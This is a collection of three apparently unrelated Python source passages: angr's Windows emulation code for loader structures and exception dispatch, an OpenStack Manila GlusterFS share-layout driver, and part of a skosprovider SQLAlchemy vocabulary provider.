state.mem[addr+0x2E].short = alloc_size - tail_start
state.mem[addr+0x30].dword = ALLOC_AREA + tail_start
for j, c in enumerate(path):
# if this segfaults, increase the allocation size
state.mem[ALLOC_AREA + j*2].short = ord(c)
state.mem[ALLOC_AREA + alloc_size - 2].short = 0
ALLOC_AREA += alloc_size
# handle the links. we construct a python list in the correct order for each, and then, uh,
mem_order = sorted(self.project.loader.all_pe_objects, key=lambda x: x.mapped_base)
init_order = []
partially_loaded = set()
def fuck_load(x):
if x.provides in partially_loaded:
return
partially_loaded.add(x.provides)
for dep in x.deps:
if dep in self.project.loader.shared_objects:
depo = self.project.loader.shared_objects[dep]
fuck_load(depo)
init_order.append(depo)
fuck_load(self.project.loader.main_object)
load_order = [self.project.loader.main_object] + init_order
def link(a, b):
state.mem[a].dword = b
state.mem[b+4].dword = a
# I have genuinely never felt so dead in my life as I feel writing this code
def link_list(mods, offset):
if mods:
addr_a = LDR_addr + 12
addr_b = LDR_addr + THUNK_SIZE * mods[0].module_id
link(addr_a + offset, addr_b + offset)
for mod_a, mod_b in zip(mods[:-1], mods[1:]):
addr_a = LDR_addr + THUNK_SIZE * mod_a.module_id
addr_b = LDR_addr + THUNK_SIZE * mod_b.module_id
link(addr_a + offset, addr_b + offset)
addr_a = LDR_addr + THUNK_SIZE * mods[-1].module_id
addr_b = LDR_addr + 12
link(addr_a + offset, addr_b + offset)
else:
link(LDR_addr + 12, LDR_addr + 12)
link_list(load_order, 0)
link_list(mem_order, 8)
link_list(init_order, 16)
return state
def handle_exception(self, successors, engine, exc_type, exc_value, exc_traceback):
if engine is not self.project.factory.default_engine:
raise exc_type, exc_value, exc_traceback
# we'll need to wind up to the exception to get the correct state to resume from...
# exc will be a SimError, for sure
# executed_instruction_count is incremented when we see an imark BUT it starts at -1, so this is the correct val
num_inst = exc_value.executed_instruction_count
if num_inst >= 1:
# scary...
try:
# what would marking this as "inline" do?
r = self.project.factory.default_engine.process(successors.initial_state, num_inst=num_inst)
if len(r.flat_successors) != 1:
l.error("Got %d successors while re-executing %d instructions at %#x for exception windup", num_inst, successors.initial_state.addr)
raise exc_type, exc_value, exc_traceback
exc_state = r.flat_successors[0]
except:
# lol no
l.error("Got some weirdo error while re-executing %d instructions at %#x for exception windup", num_inst, successors.initial_state.addr)
raise exc_type, exc_value, exc_traceback
else:
# duplicate the history-cycle code here...
exc_state = successors.initial_state.copy()
exc_state.register_plugin('history', successors.initial_state.history.make_child())
exc_state.history.recent_bbl_addrs.append(successors.initial_state.addr)
# first check that we actually have an exception handler
# we check is_true since if it's symbolic this is exploitable maybe?
tib_addr = exc_state.regs._fs.concat(exc_state.solver.BVV(0, 16))
if exc_state.solver.is_true(exc_state.mem[tib_addr].long.resolved == -1):
exc_value.args = ('Unhandled exception: %s' % exc_value,)
raise exc_type, exc_value, exc_traceback
# catch nested exceptions here with magic value
if exc_state.solver.is_true(exc_state.mem[tib_addr].long.resolved == 0xBADFACE):
exc_value.args = ('Unhandled exception: %s' % exc_value,)
raise exc_type, exc_value, exc_traceback
# serialize the thread context and set up the exception record...
self._dump_regs(exc_state, exc_state.regs._esp - 0x300)
exc_state.regs.esp -= 0x400
record = exc_state.regs._esp + 0x20
context = exc_state.regs._esp + 0x100
exc_state.mem[record + 0x4].uint32_t = 0 # flags = continuable
exc_state.mem[record + 0x8].uint32_t = 0 # FUCK chained exceptions
exc_state.mem[record + 0xc].uint32_t = exc_state.regs._eip # exceptionaddress
for i in xrange(16): # zero out the arg count and args array
exc_state.mem[record + 0x10 + 4*i].uint32_t = 0
# TOTAL SIZE: 0x50
# the rest of the parameters have to be set per-exception type
if exc_type is SimSegfaultError:
exc_state.mem[record].uint32_t = 0xc0000005 # EXCEPTION_ACCESS_VIOLATION
exc_state.mem[record + 0x10].uint32_t = 2
exc_state.mem[record + 0x14].uint32_t = 1 if exc_value.reason.startswith('write-') else 0
exc_state.mem[record + 0x18].uint32_t = exc_value.addr
# set up parameters to userland dispatcher
exc_state.mem[exc_state.regs._esp].uint32_t = 0xBADC0DE # god help us if we return from this func
exc_state.mem[exc_state.regs._esp + 4].uint32_t = record
exc_state.mem[exc_state.regs._esp + 8].uint32_t = context
# let's go let's go!
successors.add_successor(exc_state, self._exception_handler, exc_state.solver.true, 'Ijk_Exception')
successors.processed = True
# these two methods load and store register state from a struct CONTEXT
# https://www.nirsoft.net/kernel_struct/vista/CONTEXT.html
@staticmethod
def _dump_regs(state, addr):
if state.arch.name != 'X86':
raise SimUnsupportedError("I don't know how to work with struct CONTEXT outside of i386")
# I decline to load and store the floating point/extended registers
state.mem[addr + 0].uint32_t = 0x07 # contextflags = control | integer | segments
# dr0 - dr7 are at 0x4-0x18
# fp state is at 0x1c: 8 ulongs plus a char[80] gives it size 0x70
state.mem[addr + 0x8c].uint32_t = state.regs.gs.concat(state.solver.BVV(0, 16))
state.mem[addr + 0x90].uint32_t = state.regs.fs.concat(state.solver.BVV(0, 16))
state.mem[addr + 0x94].uint32_t = 0 # es
state.mem[addr + 0x98].uint32_t = 0 # ds
state.mem[addr + 0x9c].uint32_t = state.regs.edi
state.mem[addr + 0xa0].uint32_t = state.regs.esi
state.mem[addr + 0xa4].uint32_t = state.regs.ebx
state.mem[addr + 0xa8].uint32_t = state.regs.edx
state.mem[addr + 0xac].uint32_t = state.regs.ecx
state.mem[addr + 0xb0].uint32_t = state.regs.eax
state.mem[addr + 0xb4].uint32_t = state.regs.ebp
state.mem[addr + 0xb8].uint32_t = state.regs.eip
state.mem[addr + 0xbc].uint32_t = 0 # cs
state.mem[addr + 0xc0].uint32_t = state.regs.eflags
state.mem[addr + 0xc4].uint32_t = state.regs.esp
state.mem[addr + 0xc8].uint32_t = 0 # ss
# and then 512 bytes of extended registers
# TOTAL SIZE: 0x2cc
@staticmethod
def _load_regs(state, addr):
if state.arch.name != 'X86':
raise SimUnsupportedError("I don't know how to work with struct CONTEXT outside of i386")
# TODO: check contextflags to see what parts to deserialize
state.regs.gs = state.mem[addr + 0x8c].uint32_t.resolved[31:16]
state.regs.fs = state.mem[addr + 0x90].uint32_t.resolved[31:16]
state.regs.edi = state.mem[addr + 0x9c].uint32_t.resolved
state.regs.esi = state.mem[addr + 0xa0].uint32_t.resolved
state.regs.ebx = state.mem[addr + 0xa4].uint32_t.resolved
state.regs.edx = state.mem[addr + 0xa8].uint32_t.resolved
state.regs.ecx = state.mem[addr + 0xac].uint32_t.resolved
state.regs.eax = state.mem[addr + 0xb0].uint32_t.resolved
state.regs.ebp = state.mem[addr + 0xb4].uint32_t.resolved
state.regs.eip = state.mem[addr + 0xb8].uint32_t.resolved
state.regs.eflags = state.mem[addr + 0xc0].uint32_t.resolved
state.regs.esp = state.mem[addr + 0xc4].uint32_t.resolved
os_mapping = defaultdict(lambda: SimOS)
def register_simos(name, cls):
os_mapping[name] = cls
register_simos('unix', SimLinux)
register_simos('windows', SimWindows)
register_simos('cgc', SimCGC)
|
|
# Copyright (c) 2015 Red Hat, Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""GlusterFS volume mapped share layout."""
import os
import random
import re
import shutil
import string
import tempfile
import xml.etree.cElementTree as etree
from oslo_config import cfg
from oslo_log import log
import six
from manila import exception
from manila.i18n import _
from manila.share.drivers.glusterfs import common
from manila.share.drivers.glusterfs import layout
from manila import utils
LOG = log.getLogger(__name__)
glusterfs_volume_mapped_opts = [
cfg.ListOpt('glusterfs_servers',
default=[],
deprecated_name='glusterfs_targets',
help='List of GlusterFS servers that can be used to create '
'shares. Each GlusterFS server should be of the form '
'[remoteuser@]<volserver>, and they are assumed to '
'belong to distinct Gluster clusters.'),
cfg.StrOpt('glusterfs_volume_pattern',
help='Regular expression template used to filter '
'GlusterFS volumes for share creation. '
'The regex template can optionally (ie. with support '
'of the GlusterFS backend) contain the #{size} '
'parameter which matches an integer (sequence of '
'digits) in which case the value shall be interpreted as '
'size of the volume in GB. Examples: '
'"manila-share-volume-\d+$", '
'"manila-share-volume-#{size}G-\d+$"; '
'with matching volume names, respectively: '
'"manila-share-volume-12", "manila-share-volume-3G-13". '
'In latter example, the number that matches "#{size}", '
'that is, 3, is an indication that the size of volume '
'is 3G.'),
]
CONF = cfg.CONF
CONF.register_opts(glusterfs_volume_mapped_opts)
# The dict specifying named parameters
# that can be used with glusterfs_volume_pattern
# in #{<param>} format.
# For each of them we give regex pattern it matches
# and a transformer function ('trans') for the matched
# string value.
# Currently we handle only #{size}.
PATTERN_DICT = {'size': {'pattern': '(?P<size>\d+)', 'trans': int}}
USER_MANILA_SHARE = 'user.manila-share'
USER_CLONED_FROM = 'user.manila-cloned-from'
UUID_RE = re.compile('\A[\da-f]{8}-([\da-f]{4}-){3}[\da-f]{12}\Z', re.I)
class GlusterfsVolumeMappedLayout(layout.GlusterfsShareLayoutBase):
_snapshots_are_supported = True
def __init__(self, driver, *args, **kwargs):
super(GlusterfsVolumeMappedLayout, self).__init__(
driver, *args, **kwargs)
self.gluster_used_vols = set()
self.configuration.append_config_values(
common.glusterfs_common_opts)
self.configuration.append_config_values(
glusterfs_volume_mapped_opts)
self.gluster_nosnap_vols_dict = {}
self.volume_pattern = self._compile_volume_pattern()
self.volume_pattern_keys = self.volume_pattern.groupindex.keys()
for srvaddr in self.configuration.glusterfs_servers:
# format check for srvaddr
self._glustermanager(srvaddr, False)
self.glusterfs_versions = {}
self.private_storage = kwargs.get('private_storage')
def _compile_volume_pattern(self):
"""Compile a RegexObject from the config specified regex template.
(cfg.glusterfs_volume_pattern)
"""
subdict = {}
for key, val in PATTERN_DICT.items():
subdict[key] = val['pattern']
# Using templates with placeholder syntax #{<var>}
class CustomTemplate(string.Template):
delimiter = '#'
volume_pattern = CustomTemplate(
self.configuration.glusterfs_volume_pattern).substitute(
subdict)
return re.compile(volume_pattern)
def do_setup(self, context):
"""Setup the GlusterFS volumes."""
glusterfs_versions, exceptions = {}, {}
for srvaddr in self.configuration.glusterfs_servers:
try:
glusterfs_versions[srvaddr] = self._glustermanager(
srvaddr, False).get_gluster_version()
except exception.GlusterfsException as exc:
exceptions[srvaddr] = six.text_type(exc)
if exceptions:
for srvaddr, excmsg in exceptions.items():
LOG.error("'gluster version' failed on server "
"%(server)s with: %(message)s",
{'server': srvaddr, 'message': excmsg})
raise exception.GlusterfsException(_(
"'gluster version' failed on servers %s") % (
','.join(exceptions.keys())))
notsupp_servers = []
for srvaddr, vers in glusterfs_versions.items():
if common.numreduct(vers) < self.driver.GLUSTERFS_VERSION_MIN:
notsupp_servers.append(srvaddr)
if notsupp_servers:
gluster_version_min_str = '.'.join(
six.text_type(c) for c in self.driver.GLUSTERFS_VERSION_MIN)
for srvaddr in notsupp_servers:
LOG.error("GlusterFS version %(version)s on server "
"%(server)s is not supported, "
"minimum requirement: %(minvers)s",
{'server': srvaddr,
'version': '.'.join(glusterfs_versions[srvaddr]),
'minvers': gluster_version_min_str})
raise exception.GlusterfsException(_(
"Unsupported GlusterFS version on servers %(servers)s, "
"minimum requirement: %(minvers)s") % {
'servers': ','.join(notsupp_servers),
'minvers': gluster_version_min_str})
self.glusterfs_versions = glusterfs_versions
gluster_volumes_initial = set(
self._fetch_gluster_volumes(filter_used=False))
if not gluster_volumes_initial:
# No suitable volumes are found on the Gluster end.
# Raise exception.
msg = (_("Gluster backend does not provide any volume "
"matching pattern %s"
) % self.configuration.glusterfs_volume_pattern)
LOG.error(msg)
raise exception.GlusterfsException(msg)
LOG.info("Found %d Gluster volumes allocated for Manila.",
len(gluster_volumes_initial))
self._check_mount_glusterfs()
def _glustermanager(self, gluster_address, req_volume=True):
"""Create GlusterManager object for gluster_address."""
return common.GlusterManager(
gluster_address, self.driver._execute,
self.configuration.glusterfs_path_to_private_key,
self.configuration.glusterfs_server_password,
requires={'volume': req_volume})
def _share_manager(self, share):
"""Return GlusterManager object representing share's backend."""
gluster_address = self.private_storage.get(share['id'], 'volume')
if gluster_address is None:
return
return self._glustermanager(gluster_address)
def _fetch_gluster_volumes(self, filter_used=True):
"""Do a 'gluster volume list | grep <volume pattern>'.
Aggregate the results from all servers.
Extract the named groups from the matching volume names
using the specs given in PATTERN_DICT.
Return a dict with keys of the form <server>:/<volname>
and values being dicts that map names of named groups
to their extracted value.
"""
volumes_dict = {}
for srvaddr in self.configuration.glusterfs_servers:
gluster_mgr = self._glustermanager(srvaddr, False)
if gluster_mgr.user:
logmsg = ("Retrieving volume list "
"on host %s") % gluster_mgr.host
else:
logmsg = ("Retrieving volume list")
out, err = gluster_mgr.gluster_call('volume', 'list', log=logmsg)
for volname in out.split("\n"):
patmatch = self.volume_pattern.match(volname)
if not patmatch:
continue
comp_vol = gluster_mgr.components.copy()
comp_vol.update({'volume': volname})
gluster_mgr_vol = self._glustermanager(comp_vol)
if filter_used:
vshr = gluster_mgr_vol.get_vol_option(
USER_MANILA_SHARE) or ''
if UUID_RE.search(vshr):
continue
pattern_dict = {}
for key in self.volume_pattern_keys:
keymatch = patmatch.group(key)
if keymatch is None:
pattern_dict[key] = None
else:
trans = PATTERN_DICT[key].get('trans', lambda x: x)
pattern_dict[key] = trans(keymatch)
volumes_dict[gluster_mgr_vol.qualified] = pattern_dict
return volumes_dict
@utils.synchronized("glusterfs_native", external=False)
def _pop_gluster_vol(self, size=None):
"""Pick an unbound volume.
Do a _fetch_gluster_volumes() first to get the complete
list of usable volumes.
Keep only the unbound ones (ones that are not yet used to
back a share).
If size is given, try to pick one which has a size specification
(according to the 'size' named group of the volume pattern),
and its size is greater-than-or-equal to the given size.
Return the volume chosen (in <host>:/<volname> format).
"""
voldict = self._fetch_gluster_volumes()
# calculate the set of unused volumes
unused_vols = set(voldict) - self.gluster_used_vols
if not unused_vols:
# No volumes available for use as share. Warn user.
LOG.warning("No unused gluster volumes available for use as "
"share! Create share won't be supported unless "
"existing shares are deleted or some gluster "
"volumes are created with names matching "
"'glusterfs_volume_pattern'.")
else:
LOG.info("Number of gluster volumes in use: "
"%(inuse-numvols)s. Number of gluster volumes "
"available for use as share: %(unused-numvols)s",
{'inuse-numvols': len(self.gluster_used_vols),
'unused-numvols': len(unused_vols)})
# volmap is the data structure used to categorize and sort
# the unused volumes. It's a nested dictionary of structure
# {<size>: <hostmap>}
# where <size> is either an integer or None,
# <hostmap> is a dictionary of structure {<host>: <vols>}
# where <host> is a host name (IP address), <vols> is a list
# of volumes (gluster addresses).
volmap = {None: {}}
# if both caller has specified size and 'size' occurs as
# a parameter in the volume pattern...
if size and 'size' in self.volume_pattern_keys:
# then this function is used to extract the
# size value for a given volume from the voldict...
get_volsize = lambda vol: voldict[vol]['size']
else:
# else just use a stub.
get_volsize = lambda vol: None
for vol in unused_vols:
# For each unused volume, we extract the <size>
# and <host> values with which it can be inserted
# into the volmap, and conditionally perform
# the insertion (with the condition being: once
# caller specified size and a size indication was
# found in the volume name, we require that the
# indicated size adheres to caller's spec).
volsize = get_volsize(vol)
if not volsize or volsize >= size:
hostmap = volmap.get(volsize)
if not hostmap:
hostmap = {}
volmap[volsize] = hostmap
host = self._glustermanager(vol).host
hostvols = hostmap.get(host)
if not hostvols:
hostvols = []
hostmap[host] = hostvols
hostvols.append(vol)
if len(volmap) > 1:
# volmap has keys apart from the default None,
# ie. volumes with sensible and adherent size
# indication have been found. Then pick the smallest
# of the size values.
chosen_size = sorted(n for n in volmap.keys() if n)[0]
else:
chosen_size = None
chosen_hostmap = volmap[chosen_size]
if not chosen_hostmap:
msg = (_("Couldn't find a free gluster volume to use."))
LOG.error(msg)
raise exception.GlusterfsException(msg)
# From the hosts we choose randomly to tend towards
# even distribution of share backing volumes among
# Gluster clusters.
chosen_host = random.choice(list(chosen_hostmap.keys()))
# Within a host's volumes, choose alphabetically first,
# to make it predictable.
vol = sorted(chosen_hostmap[chosen_host])[0]
self.gluster_used_vols.add(vol)
return vol
@utils.synchronized("glusterfs_native", external=False)
def _push_gluster_vol(self, exp_locn):
try:
self.gluster_used_vols.remove(exp_locn)
except KeyError:
msg = (_("Couldn't find the share in used list."))
LOG.error(msg)
raise exception.GlusterfsException(msg)
def _wipe_gluster_vol(self, gluster_mgr):
# Create a temporary mount.
gluster_export = gluster_mgr.export
tmpdir = tempfile.mkdtemp()
try:
common._mount_gluster_vol(self.driver._execute, gluster_export,
tmpdir)
except exception.GlusterfsException:
shutil.rmtree(tmpdir, ignore_errors=True)
raise
# Delete the contents of a GlusterFS volume that is temporarily
# mounted.
# From GlusterFS version 3.7, two directories, '.trashcan' at the root
# of the GlusterFS volume and 'internal_op' within the '.trashcan'
# directory, are internally created when a GlusterFS volume is started.
# GlusterFS does not allow unlink(2) of the two directories. So do not
# delete the paths of the two directories, but delete their contents
# along with the rest of the contents of the volume.
srvaddr = gluster_mgr.host_access
if common.numreduct(self.glusterfs_versions[srvaddr]) < (3, 7):
cmd = ['find', tmpdir, '-mindepth', '1', '-delete']
else:
ignored_dirs = map(lambda x: os.path.join(tmpdir, *x),
[('.trashcan', ), ('.trashcan', 'internal_op')])
ignored_dirs = list(ignored_dirs)
cmd = ['find', tmpdir, '-mindepth', '1', '!', '-path',
ignored_dirs[0], '!', '-path', ignored_dirs[1], '-delete']
try:
self.driver._execute(*cmd, run_as_root=True)
except exception.ProcessExecutionError as exc:
msg = (_("Error trying to wipe gluster volume. "
"gluster_export: %(export)s, Error: %(error)s") %
{'export': gluster_export, 'error': exc.stderr})
LOG.error(msg)
raise exception.GlusterfsException(msg)
finally:
# Unmount.
common._umount_gluster_vol(self.driver._execute, tmpdir)
shutil.rmtree(tmpdir, ignore_errors=True)
def create_share(self, context, share, share_server=None):
"""Create a share using GlusterFS volume.
1 Manila share = 1 GlusterFS volume. Pick an unused
GlusterFS volume for use as a share.
"""
try:
vol = self._pop_gluster_vol(share['size'])
except exception.GlusterfsException:
msg = ("Error creating share %(share_id)s",
{'share_id': share['id']})
LOG.error(msg)
raise
gmgr = self._glustermanager(vol)
export = self.driver._setup_via_manager(
{'share': share, 'manager': gmgr})
gmgr.set_vol_option(USER_MANILA_SHARE, share['id'])
self.private_storage.update(share['id'], {'volume': vol})
# TODO(deepakcs): Enable quota and set it to the share size.
# For native protocol, the export_location should be of the form:
# server:/volname
LOG.info("export_location sent back from create_share: %s",
export)
return export
def delete_share(self, context, share, share_server=None):
"""Delete a share on the GlusterFS volume.
1 Manila share = 1 GlusterFS volume. Put the gluster
volume back in the available list.
"""
gmgr = self._share_manager(share)
if not gmgr:
# Share does not have a record in private storage.
# It means create_share{,_from_snapshot} did not
# succeed(*). In that case we should not obstruct
# share deletion, so we just return doing nothing.
#
# (*) or we have a database corruption but then
# basically does not matter what we do here
return
clone_of = gmgr.get_vol_option(USER_CLONED_FROM) or ''
try:
if UUID_RE.search(clone_of):
# We take responsibility for the lifecycle
# management of those volumes which were
# created by us (as snapshot clones) ...
gmgr.gluster_call('volume', 'delete', gmgr.volume)
else:
# ... for volumes that come from the pool, we return
# them to the pool (after some purification rituals)
self._wipe_gluster_vol(gmgr)
gmgr.set_vol_option(USER_MANILA_SHARE, 'NONE')
self._push_gluster_vol(gmgr.qualified)
except exception.GlusterfsException:
msg = ("Error during delete_share request for "
"share %(share_id)s", {'share_id': share['id']})
LOG.error(msg)
raise
self.private_storage.delete(share['id'])
# TODO(deepakcs): Disable quota.
@staticmethod
def _find_actual_backend_snapshot_name(gluster_mgr, snapshot):
args = ('snapshot', 'list', gluster_mgr.volume, '--mode=script')
out, err = gluster_mgr.gluster_call(
*args,
log=("Retrieving snapshot list"))
snapgrep = list(filter(lambda x: snapshot['id'] in x, out.split("\n")))
if len(snapgrep) != 1:
msg = (_("Failed to identify backing GlusterFS object "
"for snapshot %(snap_id)s of share %(share_id)s: "
"a single candidate was expected, %(found)d was found.") %
{'snap_id': snapshot['id'],
'share_id': snapshot['share_id'],
'found': len(snapgrep)})
raise exception.GlusterfsException(msg)
backend_snapshot_name = snapgrep[0]
return backend_snapshot_name
def create_share_from_snapshot(self, context, share, snapshot,
share_server=None):
old_gmgr = self._share_manager(snapshot['share_instance'])
# Snapshot clone feature in GlusterFS server essential to support this
# API is available in GlusterFS server versions 3.7 and higher. So do
# a version check.
vers = self.glusterfs_versions[old_gmgr.host_access]
minvers = (3, 7)
if common.numreduct(vers) < minvers:
minvers_str = '.'.join(six.text_type(c) for c in minvers)
vers_str = '.'.join(vers)
msg = (_("GlusterFS version %(version)s on server %(server)s does "
"not support creation of shares from snapshot. "
"minimum requirement: %(minversion)s") %
{'version': vers_str, 'server': old_gmgr.host,
'minversion': minvers_str})
LOG.error(msg)
raise exception.GlusterfsException(msg)
# Clone the snapshot. The snapshot clone, a new GlusterFS volume
# would serve as a share.
backend_snapshot_name = self._find_actual_backend_snapshot_name(
old_gmgr, snapshot)
volume = ''.join(['manila-', share['id']])
args_tuple = (('snapshot', 'activate', backend_snapshot_name,
'force', '--mode=script'),
('snapshot', 'clone', volume, backend_snapshot_name))
for args in args_tuple:
out, err = old_gmgr.gluster_call(
*args,
log=("Creating share from snapshot"))
# Get a manager for the new volume/share.
comp_vol = old_gmgr.components.copy()
comp_vol.update({'volume': volume})
gmgr = self._glustermanager(comp_vol)
export = self.driver._setup_via_manager(
{'share': share, 'manager': gmgr},
{'share': snapshot['share_instance'], 'manager': old_gmgr})
argseq = (('set',
[USER_CLONED_FROM, snapshot['share_id']]),
('set', [USER_MANILA_SHARE, share['id']]),
('start', []))
for op, opargs in argseq:
args = ['volume', op, gmgr.volume] + opargs
gmgr.gluster_call(*args, log=("Creating share from snapshot"))
self.gluster_used_vols.add(gmgr.qualified)
self.private_storage.update(share['id'], {'volume': gmgr.qualified})
return export
def create_snapshot(self, context, snapshot, share_server=None):
"""Creates a snapshot."""
gluster_mgr = self._share_manager(snapshot['share'])
if gluster_mgr.qualified in self.gluster_nosnap_vols_dict:
opret, operrno = -1, 0
operrstr = self.gluster_nosnap_vols_dict[gluster_mgr.qualified]
else:
args = ('--xml', 'snapshot', 'create', 'manila-' + snapshot['id'],
gluster_mgr.volume)
out, err = gluster_mgr.gluster_call(
*args,
log=("Retrieving volume info"))
if not out:
raise exception.GlusterfsException(
'gluster volume info %s: no data received' %
gluster_mgr.volume
)
outxml = etree.fromstring(out)
opret = int(common.volxml_get(outxml, 'opRet'))
operrno = int(common.volxml_get(outxml, 'opErrno'))
operrstr = common.volxml_get(outxml, 'opErrstr', default=None)
if opret == -1:
vers = self.glusterfs_versions[gluster_mgr.host_access]
if common.numreduct(vers) > (3, 6):
# This logic has not yet been implemented in GlusterFS 3.6
if operrno == 0:
self.gluster_nosnap_vols_dict[
gluster_mgr.qualified] = operrstr
msg = _("Share %(share_id)s does not support snapshots: "
"%(errstr)s.") % {'share_id': snapshot['share_id'],
'errstr': operrstr}
LOG.error(msg)
raise exception.ShareSnapshotNotSupported(msg)
raise exception.GlusterfsException(
_("Creating snapshot for share %(share_id)s failed "
"with %(errno)d: %(errstr)s") % {
'share_id': snapshot['share_id'],
'errno': operrno,
'errstr': operrstr})
def delete_snapshot(self, context, snapshot, share_server=None):
"""Deletes a snapshot."""
gluster_mgr = self._share_manager(snapshot['share'])
backend_snapshot_name = self._find_actual_backend_snapshot_name(
gluster_mgr, snapshot)
args = ('--xml', 'snapshot', 'delete', backend_snapshot_name,
'--mode=script')
out, err = gluster_mgr.gluster_call(
*args,
log=("Error deleting snapshot"))
if not out:
raise exception.GlusterfsException(
_('gluster snapshot delete %s: no data received') %
gluster_mgr.volume
)
outxml = etree.fromstring(out)
gluster_mgr.xml_response_check(outxml, args[1:])
def ensure_share(self, context, share, share_server=None):
"""Invoked to ensure that share is exported."""
gmgr = self._share_manager(share)
self.gluster_used_vols.add(gmgr.qualified)
gmgr.set_vol_option(USER_MANILA_SHARE, share['id'])
# Debt...
def manage_existing(self, share, driver_options):
raise NotImplementedError()
def unmanage(self, share):
raise NotImplementedError()
def extend_share(self, share, new_size, share_server=None):
raise NotImplementedError()
def shrink_share(self, share, new_size, share_server=None):
raise NotImplementedError()
|
|
# -*- coding: utf-8 -*-
import logging
log = logging.getLogger(__name__)
from skosprovider.providers import VocabularyProvider
from skosprovider.skos import (
ConceptScheme,
Concept,
Collection,
Label,
Note,
Source
)
from skosprovider_sqlalchemy.models import (
Thing,
ConceptScheme as ConceptSchemeModel,
Concept as ConceptModel,
Collection as CollectionModel,
Label as LabelModel,
Match as MatchModel,
Visitation
)
from sqlalchemy.orm import (
joinedload,
)
from sqlalchemy.orm.exc import (
NoResultFound
)
from skosprovider.uri import (
DefaultUrnGenerator,
DefaultConceptSchemeUrnGenerator
)
class SQLAlchemyProvider(VocabularyProvider):
'''
A :class:`skosprovider.providers.VocabularyProvider` that uses SQLAlchemy
as backend.
'''
_conceptscheme = None
'''
The concept scheme, once it has been loaded. Should never be accessed
directly.
'''
expand_strategy = 'recurse'
'''
Determines how the expand method will operate. Options are:
* `recurse`: Determine all narrower concepts by recursivly querying the
database. Can take a long time for concepts that are at the top of a
large hierarchy.
* `visit`: Query the database's
:class:`Visitation <skosprovider_sqlalchemy.models.Visitation>` table.
This table contains a nested set representation of each conceptscheme.
Actually creating the data in this table needs to be scheduled.
'''
def __init__(self, metadata, session, **kwargs):
'''
Create a new provider
:param dict metadata: Metadata about the provider. Apart from the usual
id, a conceptscheme_id can also be passed.
:param :class:`sqlachemy.orm.session.Session` session: The database
session. This can also be a callable that returns a Session.
'''
if not 'subject' in metadata:
metadata['subject'] = []
self.metadata = metadata
if 'uri_generator' in kwargs:
self.uri_generator = kwargs.get('uri_generator')
else:
self.uri_generator = DefaultUrnGenerator(self.metadata.get('id'))
try:
self.session = session()
except TypeError as e:
self.session = session
try:
self.conceptscheme_id = int(metadata.get(
'conceptscheme_id', metadata.get('id')
))
except ValueError:
raise ValueError(
'Please provide a valid integer for the conceptscheme_id.'
)
if 'expand_strategy' in kwargs:
if kwargs['expand_strategy'] in ['recurse', 'visit']:
self.expand_strategy = kwargs['expand_strategy']
else:
raise ValueError(
'Unknown expand strategy.'
)
self.allowed_instance_scopes = ['single', 'threaded_thread']
@property
def concept_scheme(self):
if self._conceptscheme is None:
self._conceptscheme = self._get_concept_scheme()
return self._conceptscheme
def _get_concept_scheme(self):
'''
Find a :class:`skosprovider.skos.ConceptScheme` for this provider.
:param id: Id of a conceptscheme.
:rtype: :class:`skosprovider.skos.ConceptScheme`
'''
csm = self.session\
.query(ConceptSchemeModel)\
.options(joinedload('labels'))\
.options(joinedload('notes'))\
.options(joinedload('languages'))\
.options(joinedload('sources'))\
.get(self.conceptscheme_id)
return ConceptScheme(
uri=csm.uri,
labels=[
Label(l.label, l.labeltype_id, l.language_id)
for l in csm.labels
],
notes=[
Note(n.note, n.notetype_id, n.language_id, n.markup)
for n in csm.notes
],
languages=[
l.id for l in csm.languages
],
sources=[
Source(s.citation, s.markup) for s in csm.sources
]
)
def _from_thing(self, thing):
'''
Load one concept or collection from the database.
:param :class:`skosprovider_sqlalchemy.models.Thing` thing: Thing
to load.
'''
if thing.type and thing.type == 'collection':
return Collection(
id=thing.concept_id,
uri=thing.uri if thing.uri is not None else self.uri_generator.generate(type='collection', id=thing.concept_id),
concept_scheme=self.concept_scheme,
labels=[
Label(l.label, l.labeltype_id, l.language_id)
for l in thing.labels
],
notes=[
Note(n.note, n.notetype_id, n.language_id, n.markup)
for n in thing.notes
],
sources=[
Source(s.citation, s.markup ) for s in thing.sources
],
members=[member.concept_id for member in thing.members] if hasattr(thing, 'members') else [],
member_of=[member_of.concept_id for member_of in thing.member_of],
superordinates=[broader_concept.concept_id for broader_concept in thing.broader_concepts],
infer_concept_relations=thing.infer_concept_relations
)
else:
matches = {}
for m in thing.matches:
key = m.matchtype.name[:m.matchtype.name.find('Match')]
if not key in matches:
matches[key] = []
matches[key].append(m.uri)
return Concept(
id=thing.concept_id,
uri=thing.uri if thing.uri is not None else self.uri_generator.generate(type='concept', id=thing.concept_id),
concept_scheme=self.concept_scheme,
labels=[
Label(l.label, l.labeltype_id, l.language_id)
for l in thing.labels
],
notes=[
Note(n.note, n.notetype_id, n.language_id, n.markup)
for n in thing.notes
],
sources=[
Source(s.citation, s.markup) for s in thing.sources
],
broader=[c.concept_id for c in thing.broader_concepts],
narrower=[c.concept_id for c in thing.narrower_concepts],
related=[c.concept_id for c in thing.related_concepts],
member_of=[member_of.concept_id for member_of in thing.member_of],
subordinate_arrays=[narrower_collection.concept_id for narrower_collection in thing.narrower_collections],
matches=matches
)
def get_by_id(self, id):
try:
thing = self.session\
.query(Thing)\
.options(joinedload('labels'))\
.options(joinedload('notes'))\
.options(joinedload('sources'))\
.filter(
Thing.concept_id == int(id),
Thing.conceptscheme_id == self.conceptscheme_id
).one()
except NoResultFound:
return False
return self._from_thing(thing)
def get_by_uri(self, uri):
'''Get all information on a concept or collection, based on a
:term:`URI`.
This method will only find concepts or collections whose :term:`URI` is
actually stored in the database. It will not find anything that has
no :term:`URI` in the database, but does have a matching :term:`URI`
after generation.
:rtype: :class:`skosprovider.skos.Concept` or
:class:`skosprovider.skos.Collection` or `False` if the concept or
collection is unknown to the provider.
'''
try:
thing = self.session\
.query(Thing)\
.options(joinedload('labels'))\
.options(joinedload('notes'))\
.options(joinedload('sources'))\
.filter(
Thing.uri == uri,
Thing.conceptscheme_id == self.conceptscheme_id
).one()
except NoResultFound:
return False
return self._from_thing(thing)
def _get_id_and_label(self, c, lan):
'''
:param skosprovider_sqlalchemy.models.Thing c: A concept or collection.
